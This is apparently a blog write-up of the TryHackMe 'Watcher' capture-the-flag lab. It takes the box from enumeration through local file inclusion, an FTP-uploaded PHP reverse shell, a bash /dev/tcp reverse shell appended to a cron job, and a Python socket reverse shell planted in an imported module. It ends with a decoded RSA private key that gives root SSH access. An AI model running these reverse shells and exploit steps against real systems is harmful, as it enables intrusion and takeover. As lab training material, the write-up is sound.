thm-watcher-public

Enumeration


Starting off with an nmap scan, I find that FTP, SSH and HTTP is open

root@kali:~/tryhackme/watcher# nmap -sC -sV 10.10.180.180
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-17 20:44 EST
Nmap scan report for 10.10.180.180
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e1:80:ec:1f:26:9e:32:eb:27:3f:26:ac:d2:37:ba:96 (RSA)
|   256 36:ff:70:11:05:8e:d4:50:7a:29:91:58:75:ac:2e:76 (ECDSA)
|_  256 48:d2:3e:45:da:0c:f0:f6:65:4e:f9:78:97:37:aa:8a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Jekyll v4.1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corkplacemats
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Running gobuster to help find directories, I find post.php and robots.txt

root@kali:~/tryhackme/watcher# gobuster dir -u 10.10.180.180 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.180.180
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt
[+] Timeout:        10s
===============================================================
2021/02/17 20:45:30 Starting gobuster
===============================================================
/index.php (Status: 200)
/images (Status: 301)
/post.php (Status: 200)
/css (Status: 301)
/robots.txt (Status: 200)

Flag 1


Going to robots.txt, I find 2 allow files

robots

Looking navigating to 10.10.180.180/flag.txt I obtain the first flag

flag1

Flag 2


Trying to access the /secret_file_do_not_read.txt file I recieve a 403 error

403

Going back to my gobuster results, I found /posts.php Navigating there, the page loads but I do not recieve anything.

200

I could try fuzzing, but first I went back to the home page and looked at the source code. Here, I find that post.php takes an arugment of post

source

Testing this, I find it is vulnerable to local file inclusion by changing the url to post.php?post=../../../../../../etc/passwd

passwd

I want to read the /secret_file_do_not_read.txt that I did not have permission to do earlier. Trying to read the file using the LFI vulnerability works and I find FTP credentials

ftpcreds

Using these credentials, I can login to FTP and download the flag_2.txt file

root@kali:~/tryhackme/watcher# ftp 10.10.180.180

Connected to 10.10.180.180.
220 (vsFTPd 3.0.3)
Name (10.10.180.180:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> dir

200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Feb 17 23:31 files
-rw-r--r--    1 0        0              21 Dec 03 01:58 flag_2.txt
226 Directory send OK.

ftp> get flag_2.txt 

local: flag_2.txt remote: flag_2.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag_2.txt (21 bytes).
226 Transfer complete.
21 bytes received in 0.00 secs (15.2022 kB/s)

I can now read the second flag

flag2

Flag 3


Looking at the FTP server, I am allowed to upload items in the /files folder

ftp> dir -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
dr-xr-xr-x    3 65534    65534        4096 Dec 03 01:58 .
dr-xr-xr-x    3 65534    65534        4096 Dec 03 01:58 ..
drwxr-xr-x    2 1001     1001         4096 Feb 17 23:31 files
-rw-r--r--    1 0        0              21 Dec 03 01:58 flag_2.txt
226 Directory send OK.

I have the ability to upload files via FTP and can then access the files using the LFI vulnerability. I also know the files directory location is /home/ftpuser/ftp/files thanks to the note that gave me the FTP credentials. This will allow me to get a reverse shell. To start, I download a php reverse shell and edit the IP address. Then I upload it to the files directory of FTP

ftp> put php-reverse-shell.php 
local: php-reverse-shell.php remote: php-reverse-shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5491 bytes sent in 0.00 secs (137.8059 MB/s)

Now that I have uploaded the file, I start a netcat listener. Then, using the LFI vulnerability, I can access the php file so it executes

curl http://10.10.180.180/post.php?post=../../../../../../../srv/ftp/files/php-reverse-shell.php

Looking at my netcat listener, I see I receive a connect back.

root@kali:~/tryhackme/watcher# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 56586
Linux watcher 4.15.0-128-generic #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 02:13:50 up  3:00,  2 users,  load average: 0.00, 0.00, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
will     pts/6    10.2.8.75        00:50   33:34   0.31s  0.31s -bash
root     pts/7    10.2.8.75        01:41   32:37   0.02s  0.02s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

I then import python3 into the shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@watcher:/$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/watcher# stty raw -echo
root@kali:~/tryhackme/watcher# fg

www-data@watcher:/$ 

I can now read the 3rd flag under /var/www/html/more_secrets_a9f10a

flag3

Flag 4


As www-data, I see I am allowed to run any command as the toby user

www-data@watcher:/$ sudo -l
Matching Defaults entries for www-data on watcher:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on watcher:
    (toby) NOPASSWD: ALL

I can easily login to the toby user without using a password by executing bash

www-data@watcher:/$ sudo -u toby /bin/bash
toby@watcher:/$ 

As toby, I can now read flag 4

flag4

Flag 5


Under toby’s home directory, I find a note stating cronjobs are running, likely under the jobs directory

toby@watcher:~$ ls
flag_4.txt  jobs  note.txt

toby@watcher:~$ cat note.txt  
Hi Toby,

I've got the cron jobs set up now so don't worry about getting that done.

This exploit is easy to find, but you could use pspy to monitor processes to find running cronjobs. Upload the pspy64 file then execute it

toby@watcher:~$ wget 10.2.8.75/pspy64
--2021-02-18 02:25:49--  http://10.2.8.75/pspy64
Connecting to 10.2.8.75:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'

pspy64              100%[===================>]   2.94M   463KB/s    in 7.6s    

2021-02-18 02:25:57 (395 KB/s) - 'pspy64' saved [3078592/3078592]

toby@watcher:~$ chmod +x pspy64 
toby@watcher:~$ ./pspy64

Looking at results, I see that the cow.sh file under /home/toby/jobs is a cronjob run every minute

2021/02/18 02:27:01 CMD: UID=1002 PID=1832   | 
2021/02/18 02:27:01 CMD: UID=1002 PID=1831   | /bin/bash /home/toby/jobs/cow.sh 
2021/02/18 02:27:01 CMD: UID=1002 PID=1830   | /bin/sh -c /home/toby/jobs/cow.sh 

Looking at this file, I see my current user can edit it

toby@watcher:~/jobs$ ls -la cow.sh 
-rwxr-xr-x 1 toby toby 46 Dec  3 03:31 cow.sh

I put a bash reverse shell at the bottom of the script to call back to my local machine

toby@watcher:~/jobs$ echo "bash -i >& /dev/tcp/10.2.8.75/8080 0>&1" >> cow.sh

After, I set up my netcat listener and wait for less than a minute. I recieve a connect back as the mat user

root@kali:~/tryhackme/watcher# nc -lvnp 8080
listening on [any] 8080 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 40798
bash: cannot set terminal process group (1887): Inappropriate ioctl for device
bash: no job control in this shell
mat@watcher:~$ 

I can now read the 5th flag

flag5

Flag 6


There is a note left on mat’s desktop from the will user. This note says I can run a python script as him using sudo

mat@watcher:~$ cat note.txt 
Hi Mat,

I've set up your sudo rights to use the python script as my user. You can only run the script with sudo so it should be safe.

Will

Running sudo -l I confirm this is true

mat@watcher:~$ sudo -l
Matching Defaults entries for mat on watcher:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mat may run the following commands on watcher:
    (will) NOPASSWD: /usr/bin/python3 /home/mat/scripts/will_script.py *

Reading the script we can run as will, I see it imports os sys and cmd

mat@watcher:~/scripts$ cat will_script.py 
import os
import sys
from cmd import get_command

cmd = get_command(sys.argv[1])

whitelist = ["ls -lah", "id", "cat /etc/passwd"]

if cmd not in whitelist:
        print("Invalid command!")
        exit()

os.system(cmd)

Looking at the file permissions, I see my current user owns cmd.py. This means I can insert a commands into cmd.py and when I run will_script.py they will execute

mat@watcher:~/scripts$ ls -la
total 16
drwxrwxr-x 2 will will 4096 Dec  3 03:31 .
drwxr-xr-x 6 mat  mat  4096 Dec  3 03:31 ..
-rw-r--r-- 1 mat  mat   133 Dec  3 03:31 cmd.py
-rw-r--r-- 1 will will  208 Dec  3 01:58 will_script.py

I grab a python reverse shell and insert it in  cmd.py

mat@watcher:~/scripts$ echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.9.2.255',9003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" > cmd.py

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“ATTACKER_IP”,5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);

And running will_script.py as will by typing the following will get us a shell.

mat@watcher:~/scripts$ sudo -u will python3 /home/mat/scripts/will_script.py cmd.py

Looking at my netcat listener, I received a connect back as will

root@kali:~/tryhackme/watcher# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 38226
$ whoami
will

I import python3 into the shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
will@watcher:~/scripts$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/watcher# stty raw -echo
root@kali:~/tryhackme/watcher# nc -lvnp 1234

will@watcher:~/scripts$ 

Now, I can read the 6th flag

flag6

Flag 7


Looking into the will user, I find he is part of the adm group

will@watcher:/home/will$ id
uid=1000(will) gid=1000(will) groups=1000(will),4(adm)

Since this is an unusual group, I want to find if there are any files under this group. Here, I find a file named key.64

will@watcher:/home/will$ find / -group adm   
/opt/backups
/opt/backups/key.b64

Reading the file shows a large base64 value

will@watcher:/home/will$ cat /opt/backups/key.b64
LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBelBhUUZvbFFx
OGNIb205bXNzeVBaNTNhTHpCY1J5QncrcnlzSjNoMEpDeG5WK2FHCm9wWmRjUXowMVlPWWRqWUlh
WkVKbWRjUFZXUXAvTDB1YzV1M2lnb2lLMXVpWU1mdzg1ME43dDNPWC9lcmRLRjQKanFWdTNpWE45
ZG9CbXIzVHVVOVJKa1ZuRER1bzh5NER0SXVGQ2Y5MlpmRUFKR1VCMit2Rk9ON3E0S0pzSXhnQQpu
TThrajhOa0ZrRlBrMGQxSEtIMitwN1FQMkhHWnJmM0RORm1RN1R1amEzem5nYkVWTzdOWHgzVjNZ
T0Y5eTFYCmVGUHJ2dERRVjdCWWI2ZWdrbGFmczRtNFhlVU8vY3NNODRJNm5ZSFd6RUo1enBjU3Jw
bWtESHhDOHlIOW1JVnQKZFNlbGFiVzJmdUxBaTUxVVIvMndOcUwxM2h2R2dscGVQaEtRZ1FJREFR
QUJBb0lCQUhtZ1RyeXcyMmcwQVRuSQo5WjVnZVRDNW9VR2padjdtSjJVREZQMlBJd3hjTlM4YUl3
YlVSN3JRUDNGOFY3cStNWnZEYjNrVS80cGlsKy9jCnEzWDdENTBnaWtwRVpFVWVJTVBQalBjVU5H
VUthWG9hWDVuMlhhWUJ0UWlSUjZaMXd2QVNPMHVFbjdQSXEyY3oKQlF2Y1J5UTVyaDZzTnJOaUpR
cEdESkRFNTRoSWlnaWMvR3VjYnluZXpZeWE4cnJJc2RXTS8wU1VsOUprbkkwUQpUUU9pL1gyd2Z5
cnlKc20rdFljdlk0eWRoQ2hLKzBuVlRoZWNpVXJWL3drRnZPRGJHTVN1dWhjSFJLVEtjNkI2CjF3
c1VBODUrdnFORnJ4ekZZL3RXMTg4VzAwZ3k5dzUxYktTS0R4Ym90aTJnZGdtRm9scG5Gdyt0MFFS
QjVSQ0YKQWxRSjI4a0NnWUVBNmxyWTJ4eWVMaC9hT0J1OStTcDN1SmtuSWtPYnBJV0NkTGQxeFhO
dERNQXo0T3FickxCNQpmSi9pVWNZandPQkh0M05Oa3VVbTZxb0VmcDRHb3UxNHlHek9pUmtBZTRI
UUpGOXZ4RldKNW1YK0JIR0kvdmoyCk52MXNxN1BhSUtxNHBrUkJ6UjZNL09iRDd5UWU3OE5kbFF2
TG5RVGxXcDRuamhqUW9IT3NvdnNDZ1lFQTMrVEUKN1FSNzd5UThsMWlHQUZZUlhJekJncDVlSjJB
QXZWcFdKdUlOTEs1bG1RL0UxeDJLOThFNzNDcFFzUkRHMG4rMQp2cDQrWThKMElCL3RHbUNmN0lQ
TWVpWDgwWUpXN0x0b3pyNytzZmJBUVoxVGEybzFoQ2FsQVF5SWs5cCtFWHBJClViQlZueVVDMVhj
dlJmUXZGSnl6Z2Njd0V4RXI2Z2xKS09qNjRiTUNnWUVBbHhteC9qeEtaTFRXenh4YjlWNEQKU1Bz
K055SmVKTXFNSFZMNFZUR2gydm5GdVR1cTJjSUM0bTUzem4reEo3ZXpwYjFyQTg1SnREMmduajZu
U3I5UQpBL0hiakp1Wkt3aTh1ZWJxdWl6b3Q2dUZCenBvdVBTdVV6QThzOHhIVkk2ZWRWMUhDOGlw
NEptdE5QQVdIa0xaCmdMTFZPazBnejdkdkMzaEdjMTJCcnFjQ2dZQWhGamkzNGlMQ2kzTmMxbHN2
TDRqdlNXbkxlTVhuUWJ1NlArQmQKYktpUHd0SUcxWnE4UTRSbTZxcUM5Y25vOE5iQkF0aUQ2L1RD
WDFrejZpUHE4djZQUUViMmdpaWplWVNKQllVTwprSkVwRVpNRjMwOFZuNk42L1E4RFlhdkpWYyt0
bTRtV2NOMm1ZQnpVR1FIbWI1aUpqa0xFMmYvVHdZVGcyREIwCm1FR0RHd0tCZ1FDaCtVcG1UVFJ4
NEtLTnk2d0prd0d2MnVSZGo5cnRhMlg1cHpUcTJuRUFwa2UyVVlsUDVPTGgKLzZLSFRMUmhjcDlG
bUY5aUtXRHRFTVNROERDYW41Wk1KN09JWXAyUloxUnpDOUR1ZzNxa3R0a09LQWJjY0tuNQo0QVB4
STFEeFUrYTJ4WFhmMDJkc1FIMEg1QWhOQ2lUQkQ3STVZUnNNMWJPRXFqRmRaZ3Y2U0E9PQotLS0t
LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=

Decrypting this base64 value shows an id_rsa.

will@watcher:/home/will$ cat /opt/backups/key.b64 | base64 -d
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAzPaQFolQq8cHom9mssyPZ53aLzBcRyBw+rysJ3h0JCxnV+aG
opZdcQz01YOYdjYIaZEJmdcPVWQp/L0uc5u3igoiK1uiYMfw850N7t3OX/erdKF4
jqVu3iXN9doBmr3TuU9RJkVnDDuo8y4DtIuFCf92ZfEAJGUB2+vFON7q4KJsIxgA
nM8kj8NkFkFPk0d1HKH2+p7QP2HGZrf3DNFmQ7Tuja3zngbEVO7NXx3V3YOF9y1X
eFPrvtDQV7BYb6egklafs4m4XeUO/csM84I6nYHWzEJ5zpcSrpmkDHxC8yH9mIVt
dSelabW2fuLAi51UR/2wNqL13hvGglpePhKQgQIDAQABAoIBAHmgTryw22g0ATnI
9Z5geTC5oUGjZv7mJ2UDFP2PIwxcNS8aIwbUR7rQP3F8V7q+MZvDb3kU/4pil+/c
q3X7D50gikpEZEUeIMPPjPcUNGUKaXoaX5n2XaYBtQiRR6Z1wvASO0uEn7PIq2cz
BQvcRyQ5rh6sNrNiJQpGDJDE54hIigic/GucbynezYya8rrIsdWM/0SUl9JknI0Q
TQOi/X2wfyryJsm+tYcvY4ydhChK+0nVTheciUrV/wkFvODbGMSuuhcHRKTKc6B6
1wsUA85+vqNFrxzFY/tW188W00gy9w51bKSKDxboti2gdgmFolpnFw+t0QRB5RCF
AlQJ28kCgYEA6lrY2xyeLh/aOBu9+Sp3uJknIkObpIWCdLd1xXNtDMAz4OqbrLB5
fJ/iUcYjwOBHt3NNkuUm6qoEfp4Gou14yGzOiRkAe4HQJF9vxFWJ5mX+BHGI/vj2
Nv1sq7PaIKq4pkRBzR6M/ObD7yQe78NdlQvLnQTlWp4njhjQoHOsovsCgYEA3+TE
7QR77yQ8l1iGAFYRXIzBgp5eJ2AAvVpWJuINLK5lmQ/E1x2K98E73CpQsRDG0n+1
vp4+Y8J0IB/tGmCf7IPMeiX80YJW7Ltozr7+sfbAQZ1Ta2o1hCalAQyIk9p+EXpI
UbBVnyUC1XcvRfQvFJyzgccwExEr6glJKOj64bMCgYEAlxmx/jxKZLTWzxxb9V4D
SPs+NyJeJMqMHVL4VTGh2vnFuTuq2cIC4m53zn+xJ7ezpb1rA85JtD2gnj6nSr9Q
A/HbjJuZKwi8uebquizot6uFBzpouPSuUzA8s8xHVI6edV1HC8ip4JmtNPAWHkLZ
gLLVOk0gz7dvC3hGc12BrqcCgYAhFji34iLCi3Nc1lsvL4jvSWnLeMXnQbu6P+Bd
bKiPwtIG1Zq8Q4Rm6qqC9cno8NbBAtiD6/TCX1kz6iPq8v6PQEb2giijeYSJBYUO
kJEpEZMF308Vn6N6/Q8DYavJVc+tm4mWcN2mYBzUGQHmb5iJjkLE2f/TwYTg2DB0
mEGDGwKBgQCh+UpmTTRx4KKNy6wJkwGv2uRdj9rta2X5pzTq2nEApke2UYlP5OLh
/6KHTLRhcp9FmF9iKWDtEMSQ8DCan5ZMJ7OIYp2RZ1RzC9Dug3qkttkOKAbccKn5
4APxI1DxU+a2xXXf02dsQH0H5AhNCiTBD7I5YRsM1bOEqjFdZgv6SA==
-----END RSA PRIVATE KEY-----

I copy this id_rsa to my local machine and change the file permissions so it is useable

root@kali:~/tryhackme/watcher# chmod 600 id_rsa

Testing this id_rsa on root, I find it is valid and allows me to login

root@kali:~/tryhackme/watcher# ssh -i id_rsa root@10.10.180.180
load pubkey "id_rsa": invalid format
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Feb 18 02:48:28 UTC 2021

  System load:  0.0                Processes:             122
  Usage of /:   22.3% of 18.57GB   Users logged in:       0
  Memory usage: 38%                IP address for eth0:   10.10.180.180
  Swap usage:   0%                 IP address for lxdbr0: 10.14.179.1


33 packages can be updated.
0 updates are security updates.


Last login: Thu Dec  3 03:25:38 2020
root@watcher:~# 

As root, I can now read the final flag

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *